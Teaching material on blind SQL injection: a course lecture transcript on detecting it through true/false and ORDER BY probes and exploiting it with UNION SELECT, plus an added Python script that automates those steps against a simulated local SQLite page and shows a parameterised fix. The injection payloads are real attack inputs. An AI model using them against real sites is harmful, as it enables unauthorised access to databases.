Discovering & Exploiting Blind SQL Injections


Lecture Transcript - Discovering & Exploiting Blind SQL Injections

In this lecture, I would like to show you an example of how to discover and exploit a blind SQL injection. A blind SQL injection is one that doesn't display any errors to you.

So, as we saw in our previous examples, let me just go to the SQL injection page. If I just put a single quote here, you'll see that it actually displays an error for me, which tells me that this page is vulnerable and I can exploit it with a SQL injection.

A blind SQL injection, however, will not show any errors for us. So right here in the Blind SQL Injection page, if I put a quote and execute it, you see that it's not going to show me any errors at all.

This doesn't mean that the web page isn't vulnerable. It just means that the website might not be displaying errors, and this page might have a blind SQL injection.

In real-life scenarios, I always approach pages and try to discover and exploit them as blind SQL injections. So I never actually look for errors, and I never depend on just inputting a single quote.

The way I test for the existence of blind SQL injections is that I try to inject a true and a false statement, and then see if the page behaves according to the statements that I've given it.

So if I give it a true statement, it should give me a valid page. If I give it a false statement, it'll give me an invalid page. What I mean by an invalid page is a page that doesn't look like what I expect; it doesn't have to show an error.

This will become clearer in the example. I'm just going to put 1 here to see a valid page. So literally I'm just putting in a normal user ID, and we can see that it's given us a valid page: it's given us the first name and the surname. This is what the default, valid page looks like in this web application.

So the first thing I'm going to try to do is give it a true statement, a statement that returns true, and this is going to be and 1=1. This is obviously true, and when I inject it, if the page is vulnerable, it should still show me the valid page.

So I'm going to inject it here: and 1=1. I forgot to put my comment, so I'm just going to add the comment, %23.

And now, as you can see, the page is showing me a valid page again, showing the first name and the surname. So it's executing well: I'm telling it that 1=1, and 1=1 is a true statement, so it's not going to affect the execution of the page.

Now what I'm going to do is try to inject a false statement. So I'm going to try to break the page, even though I'm giving it 1, which is a valid ID. So my statement is going to be and 1=0, which is false, and I'm going to go in and inject it now.

And as you can see, the page doesn't show the default valid page, even though I've given it the ID of 1. So you don't see any errors like we've seen with the normal SQL injections, but you can see that the page is invalid. It's not displaying what it should display, even though we've given it ID equals 1.

So when we give a true statement, it gives a valid page. When we give a false statement, it gives an invalid page.

We can also verify this using ORDER BY. So I'm going to put 1 and then ask it to order by 1. Ordering by only one column is basically a true statement; it's always true. So this is going to be my true statement, and I'm going to execute it here.

And as you can see, it's now displaying the valid page that we've seen with and 1=1. We can also change this to a false statement to give us an invalid page, by asking it to order by a very large number. So I'm just going to put 10000. This is going to be my false statement, and if the page is injectable, then it should show me an invalid page, or a page that I don't really expect.

And again, we see a page that we don't expect, which means that this website is vulnerable, even though it doesn't actually show us any error pages.

Now that we are sure that this page is vulnerable, we can actually exploit this vulnerability exactly the same way that we exploit normal SQL injections. So I can just do union select 1,2, and as you can see, I can display stuff in 1 and 2. So I'm going to select table_name from information_schema.tables. And I've actually misspelled schema here.

So the exploitation part is exactly the same, whether it's a blind or a normal SQL injection. The only difference is the way you discover it.

And I recommend that you always approach your websites and try to discover blind SQL injections. So never rely on only using a quote; always try to use and 1=1 and and 1=0, and also use ORDER BY, to try and discover this type of vulnerability. Because if you rely on the quotes, you'll be missing a lot of blind SQL injections that are just as useful as normal SQL injections.
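The discovery and exploitation steps from the lecture, as an added example that is not part of the lecture or the course material. It simulates a DVWA-style page that concatenates the user ID into its query and hides database errors, backed by an in-memory SQLite database with constructed sample rows. The lecture targets MySQL, where the comment is # (sent as %23); SQLite's line comment is "-- " and its schema lives in sqlite_master rather than information_schema.tables, so those two substitutions are assumptions of the simulation. Function names (vulnerable_page, safe_page, probe_boolean, count_columns, list_tables) are hypothetical.

```python
import sqlite3

# Added example, not the lecture's code: a simulated blind-injectable page plus
# the true/false, ORDER BY and UNION steps the lecture walks through.

COMMENT = "-- "   # assumption: SQLite line comment; on MySQL the lecture sends %23 (#)


def make_db():
    """Constructed sample data: a two-column users page plus an extra table to find."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "admin", "admin"), (2, "Gordon", "Brown"), (3, "Hack", "Me")])
    conn.execute("CREATE TABLE secrets (note TEXT)")
    conn.execute("INSERT INTO secrets VALUES ('constructed secret')")
    return conn


def vulnerable_page(conn, user_id):
    """Hypothetical vulnerable handler: concatenates user_id into the query and
    swallows database errors, so only the page content signals what happened."""
    sql = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    try:
        rows = conn.execute(sql).fetchall()
    except sqlite3.Error:
        return ""          # blind: no error text ever reaches the client
    return "\n".join(f"First name: {f}\nSurname: {l}" for f, l in rows)


def safe_page(conn, user_id):
    """The same page with a parameterised query; the probes below must fail here."""
    rows = conn.execute(
        "SELECT first_name, last_name FROM users WHERE user_id = ?", (user_id,)).fetchall()
    return "\n".join(f"First name: {f}\nSurname: {l}" for f, l in rows)


def probe_boolean(fetch, base_id="1"):
    """Boolean-based discovery: a true condition must leave the valid page unchanged,
    a false one must change it, and the two ORDER BY probes must agree.
    Returns (injectable, responses)."""
    baseline = fetch(base_id)
    if not baseline:
        raise ValueError("base_id must return a valid page to compare against")
    responses = {
        "and_true":  fetch(f"{base_id}' AND 1=1{COMMENT}"),
        "and_false": fetch(f"{base_id}' AND 1=0{COMMENT}"),
        "order_ok":  fetch(f"{base_id}' ORDER BY 1{COMMENT}"),
        "order_big": fetch(f"{base_id}' ORDER BY 10000{COMMENT}"),
    }
    injectable = (responses["and_true"] == baseline
                  and responses["and_false"] != baseline
                  and responses["order_ok"] == baseline
                  and responses["order_big"] != baseline)
    return injectable, responses


def count_columns(fetch, base_id="1", limit=32):
    """Step ORDER BY n upward until the page changes; the last working n is the
    number of columns the original SELECT returns (needed for the UNION)."""
    baseline = fetch(base_id)
    for n in range(1, limit + 1):
        if fetch(f"{base_id}' ORDER BY {n}{COMMENT}") != baseline:
            return n - 1
    return None


def list_tables(fetch, ncols):
    """UNION-based extraction, exactly as for a non-blind injection. Table names are
    read from sqlite_master (assumption; information_schema.tables on MySQL) and
    a non-existent id keeps the legitimate row out of the output."""
    cols = ", ".join(["name"] + ["NULL"] * (ncols - 1))
    page = fetch(f"-1' UNION SELECT {cols} FROM sqlite_master WHERE type='table'{COMMENT}")
    return [line.split(": ", 1)[1] for line in page.splitlines()
            if line.startswith("First name: ")]


if __name__ == "__main__":
    conn = make_db()
    fetch = lambda uid: vulnerable_page(conn, uid)
    print("vulnerable page injectable:", probe_boolean(fetch)[0])
    print("parameterised page injectable:", probe_boolean(lambda u: safe_page(conn, u))[0])
    ncols = count_columns(fetch)
    print("columns:", ncols, "tables:", list_tables(fetch, ncols))
```

Against a real application the comparison in probe_boolean should ignore parts of the response that change on every request (timestamps, CSRF tokens, session-specific markup), otherwise every probe looks like a "different page" and the true/false signal is lost.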
